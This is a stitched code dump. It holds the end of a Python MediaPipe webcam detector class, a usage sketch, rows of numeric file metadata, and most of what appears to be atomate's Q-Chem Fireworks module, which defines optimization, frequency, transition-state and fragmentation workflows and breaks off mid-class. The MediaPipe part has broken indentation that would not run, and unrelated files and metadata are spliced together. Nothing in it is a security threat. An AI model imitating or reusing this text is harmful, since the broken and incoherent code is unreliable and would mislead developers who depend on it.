                    cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
                # showing flipped image
                cv2.imshow('MediaPipe Holistic', flip_image)
                # quitting
                if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# =========================================================================================================================
def face_mesh(self, show_fps=True, contours=True ):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate face mesh
with self.mp_face_mesh.FaceMesh( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as face_mesh:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
                # Recolor feed (MediaPipe expects RGB input, matching the other methods)
                image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
                image.flags.writeable = False
                # Make Detections
                results = face_mesh.process(image)
                # Recolor image back to BGR for rendering
                image.flags.writeable = True
                image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face mesh results
if results.multi_face_landmarks:
for face_landmarks in results.multi_face_landmarks:
self.mp_drawing.draw_landmarks(
image=image,
landmark_list=face_landmarks,
connections=self.mp_face_mesh.FACEMESH_TESSELATION,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1 )
)
                        if contours:
self.mp_drawing.draw_landmarks(
image=image,
landmark_list=face_landmarks,
connections=self.mp_face_mesh.FACEMESH_CONTOURS,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing_styles.get_default_face_mesh_contours_style()
)
                # flipping image
                flip_image = cv2.flip(image, 1)
                # fps
                if show_fps:
                    cTime = time.time()
                    fps = 1 / (cTime - self.pTime)
                    self.pTime = cTime
                    cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
                # showing image
                cv2.imshow('MediaPipe Holistic', flip_image)
                # quitting
                if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ==================================================================================================
def hand_detector(self, show_fps=True):
        # Capturing webcam 0
cap = cv2.VideoCapture(0)
with self.mp_hands.Hands( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as hands:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
# Recolor Feed
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image.flags.writeable = False
# Make Detections
results = hands.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# hand detector results
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
self.mp_drawing.draw_landmarks(
image,
hand_landmarks,
self.mp_hands.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# flipping image
flip_image = cv2.flip(image, 1)
# fps
                if show_fps:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing flipped image
cv2.imshow('MediaPipe Holistic', flip_image)
# quitting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ==================================================================================================
def pose(self, show_fps=True):
        # capturing webcam 0
cap = cv2.VideoCapture(0)
with self.mp_pose.Pose( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as pose:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
# Recolor Feed
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image.flags.writeable = False
# Make Detections
results = pose.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_pose.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
# flipping image
flip_image = cv2.flip(image, 1)
# fps
                if show_fps:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing flipped image
cv2.imshow('MediaPipe Holistic', flip_image)
# quitting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ================================================ class end ===============================================================
if __name__ == '__main__':
pipe = mediapipe()
pipe.simple_holistic()
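The other detectors follow the same pattern; a hypothetical usage sketch (assumes a webcam at index 0 and a display; each window blocks until 'q' is pressed):

pipe = mediapipe()
pipe.complex_holistic(show_fps=True)  # face mesh + both hands + pose
pipe.face_mesh(contours=False)        # tessellation only, no contour overlay
pipe.hand_detector()
pipe.pose(show_fps=False)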
| 33.054348
| 124
| 0.573167
| 1,363
| 12,164
| 4.91416
| 0.101247
| 0.043894
| 0.056285
| 0.043147
| 0.850552
| 0.843983
| 0.843983
| 0.832039
| 0.816363
| 0.806211
| 0
| 0.035234
| 0.27902
| 12,164
| 368
| 125
| 33.054348
| 0.728506
| 0.14732
| 0
| 0.714286
| 0
| 0
| 0.023569
| 0
| 0
| 0
| 0.00194
| 0
| 0
| 1
| 0.02765
| false
| 0
| 0.013825
| 0
| 0.046083
| 0.023041
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f628266897bc73be2028fc72ce00a6d5ddaec41b
| 40,675
|
py
|
Python
|
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
# Defines standardized Fireworks that can be chained easily to perform various
# sequences of QChem calculations.
import copy
from itertools import chain
from fireworks import Firework
from atomate.qchem.firetasks.critic2 import ProcessCritic2, RunCritic2
from atomate.qchem.firetasks.fragmenter import FragmentMolecule
from atomate.qchem.firetasks.geo_transformations import PerturbGeometry
from atomate.qchem.firetasks.parse_outputs import QChemToDb
from atomate.qchem.firetasks.run_calc import RunQChemCustodian
from atomate.qchem.firetasks.write_inputs import WriteInputFromIOSet
__author__ = "Samuel Blau, Evan Spotte-Smith"
__copyright__ = "Copyright 2018, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "5/23/18"
__credits__ = "Brandon Wood, Shyam Dwaraknath"
class SinglePointFW(Firework):
def __init__(
self,
molecule=None,
name="single point",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="SinglePointSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class ForceFW(Firework):
def __init__(
self,
molecule=None,
name="force calculation",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Converge the electron density and calculate the atomic forces, aka the gradient.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
            multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="ForceSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class OptimizeFW(Firework):
def __init__(
self,
molecule=None,
name="structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Optimize the given structure.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
            multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="OptSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class TransitionStateFW(Firework):
def __init__(
self,
molecule=None,
name="transition state structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Optimize the given molecule to a saddle point of the potential energy surface (transition
state).
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
            multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
        t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="TransitionStateSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFW(Firework):
def __init__(
self,
molecule=None,
name="frequency calculation",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
        Perform a frequency calculation on the given structure.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
            multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class PESScanFW(Firework):
def __init__(
self,
molecule=None,
name="potential energy surface scan",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
scan_variables=None,
db_file=None,
parents=None,
**kwargs
):
"""
Perform a potential energy surface scan by varying bond lengths, angles,
and/or dihedral angles in a molecule.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set,
such as dft_rung, basis_set, pcm_dielectric, scf_algorithm,
or max_scf_cycles. See pymatgen/io/qchem/sets.py for default
values of all input parameters. For instance, if a user wanted
to use a more advanced DFT functional, include a pcm with a
dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30,
"basis_set": "6-311++g**"}. However, more advanced customization
of the input is also possible through the overwrite_inputs key
which allows the user to directly modify the rem, pcm, smd, and
solvent dictionaries that QChemDictSet passes to inputs.py to
print an actual input file.
scan_variables (dict): dict {str: list}, where the key is the type of variable ("stre"
for bond length, "bend" for angle, "tors" for dihedral angle),
                and the list contains all of the variable set information.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
if scan_variables is None:
raise ValueError(
"Some variable input must be given! Provide some "
"bond, angle, or dihedral angle information."
)
        qchem_input_params = qchem_input_params or {}
qchem_input_params["scan_variables"] = scan_variables
input_file = "mol.qin"
output_file = "mol.qout"
        t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="PESScanSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFlatteningOptimizeFW(Firework):
def __init__(
self,
molecule=None,
name="frequency flattening structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
max_iterations=10,
max_molecule_perturb_scale=0.3,
linked=True,
freq_before_opt=False,
perturb_geometry=False,
mode=None,
scale=1.0,
db_file=None,
parents=None,
**kwargs
):
"""
Iteratively optimize the given structure and flatten imaginary frequencies to ensure that
        the resulting structure is a true minimum and not a saddle point.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
max_iterations (int): Number of perturbation -> optimization -> frequency
iterations to perform. Defaults to 10.
max_molecule_perturb_scale (float): The maximum scaled perturbation that can be
                applied to the molecule. Defaults to 0.3.
            linked (bool): If True (default), the scratch output from one calculation will
                be passed to the next, improving convergence behavior.
            freq_before_opt (bool): If True (default False), run a frequency
calculation before any opt/ts searches to improve understanding
of the local potential energy surface. Only use this option if
linked=True.
perturb_geometry (bool): If True (default False), then modify the input geometry by some
translation matrix (N x 3, where N is the number of atoms) before optimizing.
mode (np.ndarray): If not None (default), then perturb the geometry by this matrix.
This will be ignored if perturb_geometry is False.
scale (float): Scaling factor for perturbation
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
if perturb_geometry:
t.append(PerturbGeometry(molecule=molecule, mode=mode, scale=scale))
# Make sure that subsequent firetasks use the perturbed Molecule
molecule = None
if freq_before_opt:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
else:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="OptSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="opt_with_frequency_flattener",
max_iterations=max_iterations,
max_molecule_perturb_scale=max_molecule_perturb_scale,
linked=linked,
freq_before_opt=freq_before_opt,
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={
"task_label": name,
"special_run_type": "frequency_flattener",
"linked": linked,
},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFlatteningTransitionStateFW(Firework):
def __init__(
self,
molecule=None,
name="frequency flattening transition state optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
max_iterations=3,
max_molecule_perturb_scale=0.3,
linked=True,
freq_before_opt=True,
perturb_geometry=False,
mode=None,
scale=1,
db_file=None,
parents=None,
**kwargs
):
"""
Iteratively optimize the transition state structure and flatten imaginary frequencies to
ensure that the resulting structure is a true transition state.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
max_iterations (int): Number of perturbation -> optimization -> frequency
iterations to perform. Defaults to 3. Higher numbers are not recommended, as
they rarely lead to improved performance.
max_molecule_perturb_scale (float): The maximum scaled perturbation that can be
applied to the molecule. Defaults to 0.3.
            linked (bool): If True (default True), the scratch output from one calculation
                will be passed to the next, improving convergence behavior.
            freq_before_opt (bool): If True (default True), run a frequency
calculation before any opt/ts searches to improve understanding
of the local potential energy surface. Only use this option if
linked=True.
perturb_geometry (bool): If True (default False), then modify the input geometry by some
translation matrix (N x 3, where N is the number of atoms) before optimizing.
mode (np.ndarray): If not None (default), then perturb the geometry by this matrix.
This will be ignored if perturb_geometry is False.
scale (float): Scaling factor for the geometry perturbation.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
runs = list(
chain.from_iterable(
[["ts_" + str(ii), "freq_" + str(ii)] for ii in range(10)]
)
)
if freq_before_opt:
runs.insert(0, "freq_pre")
        t = []
if perturb_geometry:
t.append(PerturbGeometry(molecule=molecule, mode=mode, scale=scale))
# Make sure that subsequent firetasks use the perturbed Molecule
molecule = None
if freq_before_opt:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
else:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="TransitionStateSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="opt_with_frequency_flattener",
max_iterations=max_iterations,
max_molecule_perturb_scale=max_molecule_perturb_scale,
transition_state=True,
linked=linked,
freq_before_opt=freq_before_opt,
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
runs=runs,
additional_fields={
"task_label": name,
"special_run_type": "ts_frequency_flattener",
"linked": linked,
},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FragmentFW(Firework):
def __init__(
self,
molecule=None,
depth=1,
open_rings=True,
additional_charges=None,
do_triplets=True,
linked=False,
name="fragment and optimize",
qchem_input_params=None,
db_file=None,
check_db=True,
parents=None,
**kwargs
):
"""
        Fragment the given structure and optimize all unique fragments.
Args:
molecule (Molecule): Input molecule.
depth (int): Fragmentation depth. Defaults to 1. See fragmenter firetask for more details.
open_rings (bool): Whether or not to open any rings encountered during fragmentation.
Defaults to True. See fragmenter firetask for more details.
additional_charges (list): List of additional charges besides the defaults. See fragmenter
firetask for more details.
            do_triplets (bool): Whether to simulate triplets as well as singlets for molecules with an
                even number of electrons. Defaults to True.
            linked (bool): Passed through to the fragmenter firetask. Defaults to False.
name (str): Name for the Firework.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
                would set qchem_input_params = {"overwrite_inputs": {"rem": {"sym_ignore":
                "true"}}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
check_db (bool): Whether or not to check the database for equivalent structures
before adding new fragment fireworks. Defaults to True.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
additional_charges = additional_charges or []
t = []
t.append(
FragmentMolecule(
molecule=molecule,
depth=depth,
open_rings=open_rings,
additional_charges=additional_charges,
do_triplets=do_triplets,
linked=linked,
qchem_input_params=qchem_input_params,
db_file=db_file,
check_db=check_db,
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class CubeAndCritic2FW(Firework):
def __init__(
self,
molecule=None,
name="cube and critic2",
